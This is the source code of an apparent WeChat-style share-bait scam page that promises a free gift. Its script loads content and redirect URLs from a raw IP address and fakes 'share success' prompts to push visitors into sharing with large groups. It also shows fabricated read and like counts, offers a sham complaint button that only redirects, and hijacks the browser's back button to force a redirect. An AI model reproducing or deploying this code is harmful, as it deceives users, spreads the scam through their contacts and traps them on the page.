                        <section class="" data-id="30" data-custom="rgb(245, 189, 209)" data-color="rgb(245, 189, 209)" style="font-family: monospace; line-height: 25.6px; widows: auto;padding: 10px; text-align: center; white-space: pre-wrap; font-size: 18.018px;"><section style="margin-top: 20px; padding: 5px; border: 1px dashed rgb(204, 204, 204); text-align: justify; line-height: 24px; box-shadow: rgb(165, 165, 165) 5px 5px 2px; font-family: " microsoft="" yahei',="" 'helvetica="" neue',="" helvetica,="" arial,="" sans-serif="" !important;="" box-sizing:="" border-box;="" background-color:="" rgb(250,="" 250,="" 250);'=""><section style="margin-top: -15px;  border: currentcolor; width: auto; text-align: left; box-sizing: border-box;"><strong><strong style="color: rgb(155, 24, 71); line-height: 20px; background-color: rgb(245, 189, 209);"><span class="" data-brushtype="text" style="padding: 5px;background: #040404;color: white;   box-shadow: #2f4a29 4px 4px 2px;">领取方式</span></strong></strong></section><section class="" data-style="margin-top: 2px; margin-bottom: 0px; padding: 0px; max-width: 100%; min-height: 1.5em; line-height: 2em;font-weight:bold;"><p style="margin: 10px;word-wrap: normal; font-size: 16px; line-height: 28.8px; white-space: normal;">1、活动剩余数量：<span style="color: blue;">1900</span>份</p><p style="margin: 10px;word-wrap: normal; font-size: 16px; line-height: 28.8px; white-space: normal;">2、每个微信号只能领取一次</p><p style="margin: 10px;word-wrap: normal; font-size: 16px; line-height: 28.8px; white-space: normal;"><span id="tips"></span></p><div class="bon">点击这里免费领取</div></section></section></section>
                        </section></section>
                    

                <!--赞赏-->
                        <br>
                        <div>
                            <img src="http://image3.135editor.com/cache/remote/aHR0cHM6Ly9tbWJpei5xbG9nby5jbi9tbWJpei9jWlYyaFJwdUFQZ1ExT3NnYVAwaWFNMmlhVXF5SFc1V1NEeG9qbUJ4UHF6UkVhQWhiaFlDcHU4aWN5VWVWaWFCWG5hNkpkaWNDYmdkQWZhRHVnUnZRVzlpY2FrUS8wP3d4X2ZtdD1naWY=" alt="">
                        </div>

                <div class="rich_media_tool" id="js_toobar">
                <div class="media_tool_meta tips_global meta_primary"><span style="color: #438AF6;margin-right: 2px;"><a href="javascript:void(0);" id="rd-origin">阅读原文</a> </span>阅读&nbsp;<span id="readNum">100000+</span></div><span style="margin-left: 0px;" class="media_tool_meta meta_primary tips_global meta_praise" id="like3" like="0"><i class="icon_praise_gray" id="icon_parise" style="background-position: 0px 0px;"></i><span class="praise_num" id="likeNum3">100000+</span>
                </span>
                    <a id="" class="media_tool_meta tips_global meta_extra" style="margin-left: 2px;" href='javascript:$.alert("我们已经收到您的投诉","<span style=color:red;>投诉成功</span>",function(){location.href="http://t.cn/RaeA2py";});'>投诉</a></div>
            </div>
        </div>
    </div>
</div>

    <style>
        .sub-title {
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 10px;
            margin-bottom: 10px;
        }
        .sub-title span {
            color: #868686;
            word-break: keep-all;
            padding: 0 4px;
            letter-spacing: 1px;
            font-size: 16px;
        }
        .sub-title::before,.sub-title::after {
            display: block;
            content: '';
            width: 50%;
            height: 0;
            border-top: 1px dotted #e1e1e1;
        }
    </style>

    <div id="ads" style="display:none">
    <div class="sub-title">
        <span>广告</span>
    </div>
    <div style="text-align: center;margin-bottom: 20px;"><a id='ad' href="javascript:void(0);"><img id="adimg" style="width: 90%;" src="https://cdn.ur.qq.com/uploadImages/2017-07-06/20170706123546.JPG" alt=""></a></div></div>
</div>


<script>
	function isHttps(){
		if("https:" == document.location.protocol){
			return true;
		}
		return false;
	}
	//获取url中的参数
 function UrlSearch() 
    {
   var name,value; 
   var str=location.href; //取得整个地址栏
   var num=str.indexOf("?") 
   str=str.substr(num+1); //取得所有参数   stringvar.substr(start [, length ]

   var arr=str.split("&"); //各个参数放到数组里
   for(var i=0;i < arr.length;i++){ 
    num=arr[i].indexOf("="); 
    if(num>0){ 
     name=arr[i].substring(0,num);
     value=arr[i].substr(num+1);
     this[name]=value;
     } 
    } 
  } 
	

	
    var Request=new UrlSearch(); //实例化
    var t=Request.t;
	$("#act_id").text(t);
	
	
    $(function () {  
		gurl = "//123.57.66.253/sharequndata.php";
		$.ajax({ 
			type:"get", 
			url:gurl, 
			data: {}, 
			dataType: 'json', 
			async : false,
			success:function(data){ 
				sdata = data;
				document.title = sdata.title;    
				$('#pic').attr('src',sdata.pic1);

				document.getElementById("content").innerHTML= sdata.content;
				document.getElementById("activity-name").innerHTML= sdata.title;
				document.getElementById("zuozhe").innerHTML= sdata.zuozhe;
				document.getElementById("tips").innerHTML= sdata.tips;
				//document.getElementById("tongji").innerHTML= sdata.tongji;
				if(sdata.adimg && sdata.yuanwen){
					document.getElementById("ads").style= "display:block";
				}
				$('#adimg').attr('src',sdata.adimg);
			} 
		});
    	  
        $('#ad').bind('click',function () {
            //cnzz_pus('img-ad');
            location.href=sdata.yuanwen;
        });

        $('#rd-origin').bind('click',function () {
            //cnzz_pus('rd-origin');
            //tj(9,srcurl);
            if(sdata.yuanwen!=""){
            	location.href=sdata.yuanwen;
        	}
        });

        $(".bon").click(function(){
           // cnzz_pus('btn-click');
			//var a='';
            //tj(1,a);
            shade();
            window.scrollTo(0,0);
        });
    });
</script>

<script language="Javascript">
    var parse = getCookie('parse');
    if(parse == 1){
        parse = true;
        $('#icon_parise').css('background-position',"0 -18px");
    }else{
        parse = false;
        $('#icon_parise').css('background-position',"0 0px");
    }
    $(document).ready(function(){
        $(".red").click(function(){
            $(this).addClass("shake");
            setTimeout(function(){
                $(".red").fadeOut();
                $(".windows").fadeIn();
            },1000);
        });
    });
    function shade(){
        height = window.innerHeight;
        console.log(height);
        $('#fxt').height(height);
        document.getElementById("fxt").style.display ="block";
        document.getElementById("js_article").innerHTML ="";
    }

    $(function () {
       $('#icon_parise').bind('click',function () {
           if(parse == false){
               $(this).css('background-position',"0 -18px");
               parse=true;
               setCookie('parse',1);
           }else{
               $(this).css('background-position',"0 0px");
               parse=false;
               setCookie('parse',0);
           }
       });
  
    });

    var hiddenProperty = 'hidden' in document ? 'hidden' :  'webkitHidden' in document ? 'webkitHidden' :  'mozHidden' in document ? 'mozHidden' : null;
    var visibilityChangeEvent = hiddenProperty.replace(/hidden/i, 'visibilitychange');
    var aaa=0;
    var okrd =1;
    var onVisibilityChange = function(){
        if (!document[hiddenProperty]) {
            console.log('页面非激活');
          	//var imgurl ="http://i4.buimg.com/595466/0fc8c81fb6c92ac6.jpg";
            if(aaa==0){
                confirm1(sdata.pic1);
                return false;
            }
            if(aaa==1){
                confirm2(sdata.pic1,sdata.pic2,sdata.picr);
                return false;
            }
            if(aaa==2){
                confirm3(sdata.pic1);
                return false;
            }
            if(aaa==3){
                ok(sdata.pic3,sdata.jpurl);
            }

        }else{
            console.log('页面激活');
        }
    };
    document.addEventListener(visibilityChangeEvent, onVisibilityChange);

    function confirm1(imgurl){
		$.alert('还需再分享到<span style="color: red;font-size: 24px;">2</span>个不同的群（群人数不少于50人）',"<span style='color: green;'>分享成功</span>",function () {
		aaa++;
        });
        rd = parseInt(Math.random()*100);
        if(rd <=50){
            $('#pic').attr('src',imgurl);
        }
        //cnzz_pus('firend1');
        //tj(2,imgurl);
    }

    function confirm2(imgurl1,imgurl2,picr) {
        $.alert('还需再分享到<span style="color: red;font-size: 24px;">1</span>个不同的群（群人数不少于50人）',"<span style='color: green;'>分享成功</span>",function () {
            aaa++;
        });
        var t= imgurl1;
        //rd = parseInt(Math.random()*100);
        if(imgurl1!=imgurl2&&imgurl2!=""){
        	t= imgurl2;
        	$('#pic').attr('src',imgurl2);
        }else{
      	  $('#pic').attr('src',imgurl1);
        }
		$('#pic').attr('src',picr);
      /**  if(rd <=50){
        	t= imgurl2;
            $('#pic').attr('src',imgurl2);
        }**/
        //cnzz_pus('firend2');
        //tj(3,t);
    }
    function confirm3(imgurl) {
	        $.alert('还需再分享到<span style="color: red;font-size: 26px;">1</span>个不同的群（群人数不少于50人）',"<span style='color: red;'>分享失败</span>",function () {
            aaa++;
        });
        $('#pic').attr('src',imgurl);
        //cnzz_pus('firend3');
       // tj(4,imgurl);
    }
    function ok(imgurl,xbimg) {
    	  rd = sdata.rd;
          if(rd==1){
              $.modal({
                  title: "<span style='color: green;'>只差最后一步</span>",
                  text: '长按图片<span style="color: red;">保存图片</span>，分享图片到朋友圈，并获取至少三个赞，系统审核通过后，优惠卡将发送至您的微信卡包中，请及时使用!',
                  buttons: [
                      {
                          text: "<span>确定</span>", onClick: function(){
                          }
                      }
                  ]
              });
              //cnzz_pus('pyq');
  			  //tj(5,imgurl);
          }else{
              $.modal({
                  title: "<span style='color: green;'>分享成功</span>",
                  text: '恭喜您获得了领取资格，请耐心等待系统审核',
                  buttons: [
                      {
                          text: "<span>确定</span>", onClick: function(){
                              location.href=sdata.jpurl;
                          }
                      }
                  ]
              });
              //cnzz_pus('xs');
   			  //tj(9,xbimg);
          }
    	
    }
    window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
    function jp() {location.href=sdata.back_url;}
    setTimeout('hh();', 200);
    
	(function () {
	try {
		//var videoIframes = document.querySelectorAll('.video-frame'),

		var videoIframes = $("iframe"),
				w = document.querySelector('#activity-detail').clientWidth-10,//document.body.clientWidth - 20,
				
		//视频高度为屏幕宽度的0.76
				h = Math.round(w * 0.8);
				if(w>640){w=640;h=512;}
		for (var i = 0, len = videoIframes.length; i < len; i++) {
			var videoIframe = videoIframes[i],
					src = videoIframe.src;
			videoIframe.src = src.replace(/width=(\d+)/, function () {
				return arguments[0].replace(arguments[1], w);
			}).replace(/height=(\d+)/, function () {
				return arguments[0].replace(arguments[1], h);
			});
			videoIframe.height = h;
			videoIframe.width = w;
		}
	} catch (e) {
	}
})();
</script>
<div style="display:none">
<script src="https://s22.cnzz.com/z_stat.php?id=1262811656&web_id=1262811656" language="JavaScript"></script>
</div>
</body></html>